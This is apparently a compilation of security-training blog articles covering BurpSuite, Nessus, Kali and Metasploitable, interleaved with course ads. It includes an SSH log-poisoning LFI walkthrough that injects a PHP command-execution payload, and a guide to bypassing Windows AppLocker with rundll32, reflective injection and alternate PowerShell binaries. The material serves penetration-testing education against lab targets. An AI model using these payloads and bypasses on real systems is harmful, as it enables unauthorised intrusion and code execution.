BurpSuite

What is BurpSuite?

Burp Suite

When it comes to the field of securing web applications, BurpSuite arises shiningly. PortSwigger Security is the responsible company of producing BurpSuite developed in Java programming language. In fact, there are two versions of this important security tool:

  1. A free version which is up for any free downloads online. It is named as the Free Edition.
  2. And there is the other version which is of course not free and referred to as the Professional Edition. It is usually purchased after having a period of the free trial.

The purpose of BurpSuite was to have a complete web application solution for the entire checking and solution process related to the web application. One of the most interesting issues about BurpSuite is that a mobile application was developed having the same tools as the desktop versions to be utilized on new IOS versions.

What are the tools that BurpSuite offers?

Burp Suite

Let’s now have a look at the tools which BurpSuite provides its users with. Actually, there are several tools offered by Burp Suite. They facilitate the penetration testing to establish the security of a web application.

  1. It could work as an HTTP proxy: A web proxy server is offered by BurpSuite, This is in order to get the man-in-the-middle attack performed between a client using his/her own browser and a web server at the other end of the connection. Following this, any raw traffic running between the two ends could then be simply inspected and modified afterward.
  2. It offers a great Scanner. A scanner which scans for the web application’s vulnerabilities is also offered by BurpSuite. It has the capability to make such scans automated for finding such vulnerabilities. This is considered as a very important aspect regarding web application’s penetration testing and security.
  3. Intruder – The importance of such a tool lies in the fact that it has the ability to launch attacks on a vulnerable web application. There are in fact several methods to perform such attacks through the Intruder tool. They include SQL Injections, Cross Site Scripting, parameter manipulation and vulnerabilities susceptible brute-force attacks. Such tool searches for such attackable vulnerabilities and whenever detected, then the attack is up for the launching. A configurable algorithm is provided to this tool’s user in order to get HTTP requests generated then.
  4. Spider – If it is manual mapping that is to be used, such tool makes it easy and really fast for its user to map the content of an application with its functionalities. A web application can be crawled by this tool in fact.
  5. Repeater –  A user can get an application tested by such tool. To elaborate, the methodology to do such testing is that the server gets a modified request from the tool, then another request reaches the application. The results are observed thereby to understand the behavior.
  6. Decoder – Such tool is very interesting especially when it comes to encoded data. It has the ability to recognize and detect different types of formats used for the encoding purposes, depending on some exciting techniques. Encoded data can get back to its canonical format in this manner. This could happen the other way around such that raw data gets transformed into forms that are hashed and encoded.
  7. Comparer – Such tool has the ability to compare between two pieces of data and detect any differences between both of them.
  8. Extender – The interesting point about this tool is that it allows for the Burp Suite to get utilized by a third-party code or security testers afterward. This way, extensions of Burp Suite can get loaded for more security functionalities.
  9. Sequencer – Such tool helps with the process of getting the quality of randomness analyzed and measured inside a sample of data items. In this way, session tokens or other data which is to be secured and not able to get precited becomes predicted on the other hand.

Examples of such vital tokens are anti-CSRF tokens, password reset tokens, and

others. They are definitely set to never get detected and discovered.

Let’s now get started with Burp Suite

  • How to launch BurpSuite?

  1. It is important to note that the software is written in Java programming language. The extension in which such software is an extension of .jar which is, in fact, a standalone Java extension.
  2. Browse the website of PortSwigger.net and get the free edition downloaded from there.
  3. In case you are however a professional user, you should then get logged in with your credentials and get the Professional Edition downloaded now.
  4. For the jar file to work, a Java environment is required, which is at the end of the day a replacement of the necessity for any contents of such file to get unpacked.
  5. Make sure that Java is installed before beginning to use Burp Suite.
  6. Get the command prompt opened using different methods according to your operating system:

Burp Suite

 

  • If you are a Windows user, then the start button should be pressed on then “cmd” should be typed into the search box. Then the program should be clicked on to get open now.
  • If you happen to be a user of Mac OS X, then you should press “Applications” which is in fact inside the system dock. Now, click on “Utilities” from which “Terminal app” should be chosen.
  • However, if you are a user of Linux system, then the “Console” or the “Shell” should be chosen under the lists of applications.
  1. Inside the command prompt, you just opened, type the following command now “java –version”
  2. In case that Java is already installed on the machine which is used, then the message which is to appear is the following message: “java version “1.6.0_21”. It is important to note that the needed version of Java is at least 1.6
  3. Now, the .jar file of Burp can be clicked on in order to open the Burp file directly. However, launching Burp using the command line grants whoever doing so with the privilege of much controls and several utilities upon execution. Such controls are for example like specifying how much memory should be dedicated for the sake of running Burp Suite on the machine.
  4. Let’s try the following command for instance:
java -jar -Xmx1024m /path/to/burp.jar

This command will accordingly specify an amount of 1024 Mbs for Burp while the Burp file is located in /path/to/burp.jar

  1. Now, a splash screen should get displayed at the moment to indicate that it works perfectly.

Let’s get to select a project

There are actually three categories to choose between when it comes to opening a project or creating a new one:

  1. Temporary Project: If there is no necessity to get the data saved and used afterward, then this category works the best. All data is however saved on the volatile memory.
  2. New Project on Desk: For this option, a Burp project fie is required. A new project is created consequently and a name should be given to such a project.
  3. Open existing project:

This simply allows for opening an existing project. However, the tools of Spider and

Scanners are by default paused at such moment.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

References

https://en.wikipedia.org/wiki/Burp_suite https://wiki2.org/en/Burp_suite”https://wiki2.org/en/Burp_suite
https://wiki.archlinux.org/index.php/Burp_suite”https://wiki.archlinux.org/index.php/Burp_suite
https://portswigger.net/burp/help/suite_gettingstarted.html”https://portswigger.net/burp/help/suite_gettingstarted.html
https://portswigger.net/burp/help/suite_usingburp.html”https://portswigger.net/burp/help/suite_usingburp.html

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

How to perform SSH Log Poisoning through LFI to exploit a web server?

It is important to get to know a great method to exploit a web server which essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.

LFI

The following steps explain how one can perform this process on Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect the target through using SSH service. The following command can be in a great use then
    ssh [email protected]
  3. Check the permission of auth.log file beforehand using the following command
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file appears to have the read-write permission. They should appear like the following:
    -rw-r—r—r—syslog adm …...
  5. We can now have access to the file and read all read all its logs through the following command:
    tail -f /var/log/auth.log
  6. We can walk through the logs and check the specific logs of the user named “mfsadmin”.
  7. Now, let’s attempt to connect to the web server using a counterfeit username. One can use the following command for an invalid login
    ssh [email protected]
  8. The permission should now be denied and shown clearly as follows
    "Permission denied, please try again."

    LFI

  9. Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
  10. This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
    ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105
  11. Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user  <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2
  12. Let’s assume that you have previously created LFI and now we try to browse to it using the following link:
    192.168.1.105/lfi/lfi.php
  13. An error will appear looking like local file inclusion vulnerability.
  14. The auth.log file should get included as a parameter now through the following URL inside the browser:
    192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
  15. Note that a warning will display, with the following text:
    Warning cannot execute a blank command
  16. Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.
  17. Let’s now browse into
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
    

    this will dump the data of auth.log besides executing a comment given through cmd

  18. Let’s now browse into
     "192.168.1.105/lfi/lfi.php file=/var/log/auth.log&c=pwd". 
    

    This way, the results can display inside the window.

What is Kali Linux? 

One of the most important security tools to understand and work on very well is, in fact, Kali Linux. But let’s discuss its benefits in a nutshell.

LFI

⦁ Penetration testing and digital forensics always consider such tool as an essential one for their purposes.
⦁ It provides its user with a variety of tools and functions which fall into thirteen categories:
⦁ Information Gathering such as Dmitry
⦁ Vulnerability Analysis like Inguma
⦁ Tools for exploitation as Metasploit Framework
⦁ Wireless Attacks like WIFI Honey
⦁ Forensics such as Binwalk
⦁ Web Applications like Skipfish
⦁ Stress testing like FunkLoad
⦁ Sniffing and Spoofing as Wireshark
⦁ Password attacks like done by TrueCrack
⦁ Maintaining Access such as Intersect
⦁ Hardware hacking performed by dex2jar for instance
⦁ Reverse Engineering that can for instance use Apktool
⦁ Reporting tools as MagicTree

What is Metasploitable?

LFI

Basically, Metasploitable is a vulnerable machine which is intended to be used for the sake of purposes such as being trained, test an exploit or even general target practice. The unique aspect about Metasploit is that it has the capability to check vulnerabilities on the layer of the operating system and network services, not merely the applications layer.

Metasploitable 2 is like a good bag which contains a bunch of security tools such as Metasploit. A production environment usually has Metasploit 2 to help them with the process of examining and practicing the exploits of vulnerabilities.

Metasploitable 3 is even a newer version of Metasploitable. It is a virtual machine essentially built from the ground up with a lot of security vulnerabilities.  Through such version, Metasploit is the security tool utilized to test exploits. The BSD-style license is the one under which Metasploitable3 got released originally.

The following are requirements to run Metasploitable:

  1. An operating system which is capable of running all of the required applications listed below.
  2. VT-x/AMD-V Supported Processor recommended
  3. 65 GB Available space on drive
  4. 4.5 GB RAM

So we have mentioned that Metasploitable basically uses Metasploit in the first place. Let’s talk in the last few lines about Metasploit in fact.

LFI

The Metasploit Project is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Penetration testing refers to an authorized simulated attack on computer system. It looks for security weaknesses, and Instruction Detection System (IDS) signature, which on the other hand monitors a network or systems for malicious activities. The most related sub-project is the famous open source Metasploit Framework, which is the most common exploit development framework in the world. I will elaborate on this framework idea later on in this article.

Finally, one could use Metasploit to perform some legitimate and unauthorized accesses and activities on computer systems. In this regard, it is no different from any other commercial similar products such as Immunity’s Canvas or Core Security Technologies. Metasploit, however, is commonly applicable in breaking into remote systems or test for a computer system vulnerability.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

References

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

https://en.wikipedia.org/wiki/Tunneling_protocol

https://en.wikipedia.org/wiki/SOCKS

https://en.wikipedia.org/wiki/Comparison_of_proxifiers

https://en.wikipedia.org/wiki/TUN/TAP

http://www.hackingarticles.in/perform-remote-tunneling/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://linux.byexamples.com/archives/115/ssh-dynamic-tunneling/

https://ypereirareis.github.io/blog/2016/09/19/ssh-tunnel-local-remote-port-forwarding/

https://coderwall.com/p/pmf0tw/understand-local-remote-and-dynamic-ssh-tunneling

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

http://www.hackingarticles.in/metasploitable-3-exploitation-using-brute-forcing-ssh/

http://www.hackingarticles.in/secure-port-using-port-knocking/

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

https://en.wikipedia.org/wiki/RealVNC

https://nmap.org/

http://resources.infosecinstitute.com/metasploitable-2-walkthrough/#gref

https://www.vulnhub.com/entry/metasploitable-2,29/

https://github.com/rapid7/metasploitable3

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

Nessus

What is Nessus?

Nessus is a renown software from Tenable Network Security. It specifies in monitoring and scanning for security vulnerabilities. The initial release of this software was free to use for non-enterprise clients. According to sechtools.com, it ranked the first vulnerability scanner and the most common among its counterparts in years of 2000, 2003, and 2006.

Nessus

Nessus

There are four main types of Nessus software. There is Nessus Cloud which represents a Software as a Service (SaaS) platform. Another type is Nessus Manager, which serves as a physical or virtual vulnerability manager. Nessus Professional is a version that could run a device such as a laptop device or a Personal Computer (PC). Finally, the free type of Nessus is its Home which is for home-user customers.

Historical Overview

Nessus

In 1998, Renaud Deraison aimed to create a free remote security scanner and publish it online, making it available for all people around the world. Back then, the project was an open source project. This was until the year 2005 when it turned to a closed source owned by Tenable Network Security, cofounded by Deraison.

In 2005, Tenable Network Security established that more that seventy-five thousand organizations around the world used it. At that time, it was Nessus 3 which existed, and until the moment its engine is free to use, but it costs $100/month per scanner. Nessus 3 supports Microsoft Windows, Unix, Linux, and some other operating systems.

However, before Nessus 3 existed Nessus 2 which required an agent to operate its functions on several operating systems. There is no need to mention how slow it was to use it back then. Nessus 2 operated under the General Public License (GPL), paving the way for developing similar projects like OpenVAS and Porz-Wahn, which are both open source projects. Despite this fact, there was an implementation of many updates on this version of Nessus by Tenable Network Security even after Nessus 3 came to existence.

In 2008, status got better to some extent from the original company’s and users’ perspectives. when a free version for home users became available to plugin feeds. Meanwhile, enterprises had –and still have—to pay for using the software for commercial purposes.

In 2009, Tenable Network Security released Nessus 4. It would later release Nessus 5 in 2012 and later the newest version, Nessus 6, in 2014.

What does Nessus do?

Nessus

Let’s now discover what features it has, and to what extent such software could be beneficial for security purposes. First of all, let me begin with some services that Nessus 3 and its descendants are able to provide their holders with.

  • It automaticity scans for vulnerabilities and analyzes them in order to prioritize recommended remediation.
  • Every-day plug-ins are fed to customers’ computers to update them with any new emerging vulnerabilities –being revealed in public– that could be detected subsequently.
  • Supports Supervisory Control and Data Acquisition (SCADA) audits.
  • Supports audit on Embedded Devices
  • It offers mobile device scanning.
  • A web application and a cloud environment are also available for harnessing by it.
  • It could search for any sensitive data such as social security numbers, credit card details, and much other confidential information.
  • Nessus 3 offers a means of technical support for an organization
  • It can audit Anti-Virus configurations.
  • It can audit Federal Desktop Core Configuration (FDCC) standards
  • Nessus 3 supports the audit of The Payment Card Industry Data Security Standards (PCI-DSS) as well.

Now, why don’t we break down the types of vulnerabilities detectable when scanning through it?

  1. Vulnerabilities related to passwords such
    • System accounts having no passwords
    • System accounts having default passwords or those consisting of those passwords provided on initial setup or after reset
  2. Vulnerabilities with which remote exploitations could grant access to sensitive data
  3. Misconfiguration vulnerabilities such as missing software patches, or open mail relay
  4. Vulnerabilities related to Denial of Service attack of TCP/IP stack via sending some mangled packets through the network
  5. Arrangements for conducting PCI DSS audits

Is Nessus actually necessary?

The answer to this question is logically deductible after summarizing its unique capabilities. These abilities could help determine the reasons for choosing it.

  • Some endpoint agents could be configured on a device:
    • They allow for offline scans and report results to Nessus Cloud and Nessus Manage administrators whenever an internet connection gets established.
    • They have also the ability to scan devices for malware.
  • Upon buying Nessus professional for a particular organization, or even hosting on Nessus Cloud and Nessus Manager, technical support for any issue related to it is always available.
  • On-demand – and completely free– training are offered either physically in specified centers of Tenable Network Security, virtually, or even on-site where the customer is based.
  • Nessus console has an enhanced user-friendly Graphical User Interface (GUI).
    • One can apply Security policies by a bunch of clicks and checks.
    • Email notifications could be targeted by administrators of an organization for scan results and recommended remediation to apply.
    • Preconfigured reports or customized ones could be run as a host by administrators.
  • It utilizes the Representational State Transfer Application Program Interface (RESTful API) to easily integrate into any organization.
  • CyberArk is supported to be integrated with by both Nessus Cloud and Nessus Manager for the sake of credential management, with various patch management systems. To illustrate some of the companies providing the entitled Systems:
    • For computer systems: Microsoft, Dell, IBM, and Redhat.
    • For mobile systems: Apple, Microsoft, AirWatch, and MobileIron.

Given all of these premises and depending on several business practices, my answer to the initial question is definitely yes. All of the aforementioned characteristics distinguish it from all of its other software counterparts. Some other scanners may have one of these characteristics, yet it is almost impossible so far to find something containing all of such powers.

How to use Nessus for Penetration testing?

Nessus is not actually a penetration testing tool. However, its scanning results –when combined with all penetration testing tools—could be an indicator of the security risk of a computer system. Testing tools which could be for example utilized in this regard are Immunity CANVAS, Core IMPACT, and definitely Metasploit. In addition, in the case of any password-related vulnerability, it has the power to use the password cracking tool named Hydra to get the password and get access afterward.

One, for instance, could harness the tools of Nessus Home to the maximum to help with penetration testing. Nessus Home is a free version as mentioned before.

 

  1. Download it and install it.
  2. Set Up Nessus Account and Activate the installed copy through the activation codeNessus
  3. Start a Vulnerability ScanNessus
  4. Understand the results: In case we choose Basic Network Scan, check through each given device Internet Protocol (IP) address and understand from where the vulnerabilities are actually originated from.NessusNessusNessus
  5. Discover how to exploit such devices. Though it doesn’t have a specialty in this matter, it will show you where to go.Nessus

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

References

https://en.wikipedia.org/wiki/Nessus_(software)

http://lifehacker.com/how-to-use-nessus-to-scan-a-network-for-vulnerabilities-1788261156

http://searchsecurity.techtarget.com/feature/Tenable-Nessus-Vulnerability-Scanner-Product-overview

https://www.quora.com/Is-Nessus-a-must-use-software-for-penetration-testers

https://www.google.com.eg/search?q=Nessus&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjhztGv_-bUAhUJ0RQKHWLoD4kQ_AUICigB&biw=1366&bih=613#imgrc=kyqbSwXHfvlyXM

https://www.google.com.eg/search?q=nessus+cloud&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjXkujP_-bUAhUNrRQKHWbfB40Q_AUICigB&biw=1366&bih=613#imgrc=dd_OH6sGoySy4M

https://www.google.com.eg/search?q=nessus+home&source=lnms&tbm=isch&sa=X&ved=0ahUKEwi0htKKgOfUAhVH0RQKHXSSC-UQ_AUICygC&biw=1366&bih=613#imgrc=EBTfueJXu2OXmM

https://www.google.com.eg/search?q=nessus+professional&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjJ-9-gwOnUAhVFshQKHX5bDfwQ_AUICigB&biw=1366&bih=662#imgdii=r9p2iinxkEBh4M:&imgrc=O2Sm1jLf8kdcKM:

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

How to Bypass a Windows AppLocker?

Quick Background on AppLocker

First, we need to get an insight into what an Applocker is and its mechanism before going through the technical details.

AppLocker is basically a software from Microsoft that grants some users specific privileges while preventing other users from the same privileges. In other words, some users have the freedom to open some particular applications on the operating system whereas some others don’t have the rights to open these applications. For instance, one user could freely run Internet Explorer, and another cannot even open it. Most sensitive machines such as Automated Teller Machines (ATM) and computers inside important organizations all use AppLocker

AppLocker essentially covers five main categories of files:

  • Executable files coming in .exe and .com extensions such as ipconfig.exe
  • Installer files which are utilized by Windows to get any new software installed on the computer or the machine; such files come in .msi, .msp, and .mst extensions
  • Script files which come in .ps1, .vbs, .vba, and .cmd and .js extensions
  • Packaged Apps which one installs through Microsoft Store
  • DLL files which come in .dll and .ocx extensions

Throughout this article, the main focus is in the common file formats used when talking about security restrictions and privileges using AppLocker. Therefore, I will mostly maintain executable files, installers, and script files.

How to activate AppLocker on your machine

  1. Open Administrative Tool -> Services
  2. Get through the Group Policy Editor which differs between one domain controller (gpmc.msc) and on (gpedit.msc) on local machines
  3. If the last steps did not work, type “Edit group policy” inside the search text box inside the menu bar.
  4. Under “Security Settings” open “Application Control Policies”Windows AppLocker
  5. Press “Configure Rule Enforcement” in order to choose among the five aforementioned application categories, and apply an appropriate filtering accordingly.
  6. Three main points should now determine the rules which should govern the usage of each of those categories:

a. Execution Path:

By default, all executable files and scripts which reside inside the following two directories “C:\Windows” and “C:\Program Files” are allowed. If this was not the case for such files in these locations, the system would not boot in the first place.

b. Information about the Publisher:

Sometimes AppLocker relies on the vendor’s public key to sign a specific executable file as binary files. Based on this, AppLocker may decide to get such file allowed or denied.–Windows AppLocker

c. File Hash:

AppLocker stores Message Digest 5(MD5) hashes of executable files, and therefore depends on them to decide whether to allow a certain file or not. Although this aspect requires a great deal of memory usage, it is essential for AppLocker in order to prevent any hazardous executable file from running.

Consider a Standard Setup

When the user doesn’t change any of the default rules over the files, we are left with all the executable files (other than those located at “C:\Windows” and “C:\Program Files”) without the ability of running them anywhere on the machine. This is a problem because for instance, we cannot run Meterpreter.exe.

There is, in fact, a way out of this problem. Think about this way; executable files aren’t allowed to run at several locations inside the machine while other locations don’t prevent running the same executable files. If these latter locations could become known by you, you as a standard user with no admin privileges will enjoy running any desired executable files inside the machine; it seems straightforward, right? Well, it is actually a tedious work to go through each location and investigate it manually to see the applied rules on it. What is the solution then?

Basically, PowerShell script is an appropriate method to automatically identify where it is accessible to write –to run our executable file— This basic installation will let “C:\Windows\Tasks” and “C:\Windows\tracing” writable by everyone.

  • In order to make the PowerShell show us these files, “Get-Content” and “Invoke-Expression” commands are to be used.Windows AppLocker

  • Once we get to know these files are writable, copy the desired executable file “mimikatz.exe” or “meterpreter.exe” or whatever executable file you want to run on the machine.
  • Run the desired executable file now. Note that the reason for having an executable file lies in it simplicity having a certain malware or a custom tool for example. However, it does not require an executable file for an attack; this could be done simply using Invoke-Expression through which we bypass any execution path restriction.Windows AppLockerWindows AppLocker

Now, consider this case instead. You have searched for writable directories, and weren’t able to find any. How would you react then? If we could store the executable file that we want somewhere in the memory and then jump to its address/location without the need for any directories, then, we would solve the problem.

  • Use a PowerShell variable to store the executable fileWindows AppLocker
  • Make use of PowerSploit framework by using its function called Invoke-ReflectivePEInjection. It will load this file into a memory location to which you should jump in order to run the file.Windows AppLocker

Consider a more advanced Setup

What if the user was aware of the vulnerabilities of the default rules? He rather restricted the usage of cmd.exe and PowerShell.exe to get ascertained that all the previous steps which rely on these applications could never be used.Windows AppLocker

  • Look for something forgotten by the user to be blocked
  • In this case, the user took care of all the Windows-64 tools and applied what rules he wished for on them. Still, he overlooked Windows-32 tools, which would be the way to go instead. Simply use the “C:\Windows\SysWOW64\” location to open the PowerShell from where we could manipulate and play around with our executable file as mentioned before.Windows AppLocker
  • Even if we merely search for “PowerShell.exe”, we will find several versions of PowerShell each having its unique hash. There would be still a plenty of PowerShells having hashes other than the blocked one.Windows AppLocker
  • If all of the above-shown instances of PowerShell are blocked along with cmd.exe, there is still a way out.
  • Use “C:\Windows\System32\wbem\wmic.exe”. This utility could make us very close to know information about the system. It will not be that easy of course as it was on the PowerShell; nevertheless, it still provides us with an alternative.Windows AppLocker

Consider a more advanced Setup

The user could be capable enough to block all of the previous methods. Even WMIC cannot run in this case. There is always a way out!

  • Note the files of type DLL which are not blocked
  • Search for a DLL implementation of PowerShell online
  • Download it into any folder
  • Run the file using the utility of “C:\windows\system32\rundll32.exe”
  • To execute it: type the DLL and its entry point function. In our case, type “rundll32.exe PowerShdll.dll,main”Windows AppLocker

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

References:

http://www.hacking-tutorial.com/hacking-tutorial/how-to-bypass-windows-applocker/#sthash.yGAUxClg.dpbs

https://technet.microsoft.com/en-us/library/ee460956(v=ws.11).aspx

 

Finally, check out my other article on Transferring files from Linux to Windows (after exploit).

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!